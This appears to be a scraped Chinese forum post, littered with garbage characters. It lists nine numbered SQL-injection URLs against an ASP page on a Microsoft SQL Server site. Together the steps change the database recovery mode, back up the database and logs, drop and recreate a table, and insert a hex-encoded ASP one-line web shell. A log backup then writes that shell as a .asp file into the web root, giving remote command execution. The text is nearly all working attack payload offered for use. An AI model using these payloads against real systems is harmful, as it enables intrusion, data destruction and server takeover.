第一步
# w2 Y# [$ c. Z# Khttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
' H1 y7 r5 X8 [+ Q, O- p
; l. x; D; d$ z# F+ X2 J; N第二步:) O) `. x8 b# c3 {9 g% ]
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--' P' U" J, i3 }3 F! j% W
, ^. d d5 t& v7 v. Y% X. d! ^* [
第三步# E1 c# V+ a5 T8 H& r( P
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--$ q Q6 h7 u. E$ ~
' K H4 E+ S/ _第四步( |, O+ A; t3 C! P$ |; }5 b
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--. v" y" A; j* H8 G D
: ?$ ]$ x3 K+ v6 f% f# A第五步
' N8 B6 [5 c$ }+ Yhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
* Y) @( V2 @- `1 O: o4 p$ I, `) x3 e; ~7 `( Y" a7 i: }1 C& |4 |/ c
第六步
6 y8 T* H0 Q0 Y/ c6 Dhttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--5 V- i! }/ _- f9 B1 k9 P8 H
/ E, \ [2 D7 w- e/ F- B第七步/ j; L0 V P& x) d. o
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
3 A, P% v- S# T% G
( E9 r) p2 T& D0 g0 }& ]第八步
1 D. i# O# R9 F! [1 Y! ?http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]-- } p% a. C9 E) l( y; }, c
& S* V- w5 v! Z* }8 J9 `
第九步
. h+ E# T0 _5 b& ?http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--5 P$ R* s3 \% G/ O' ~! y
|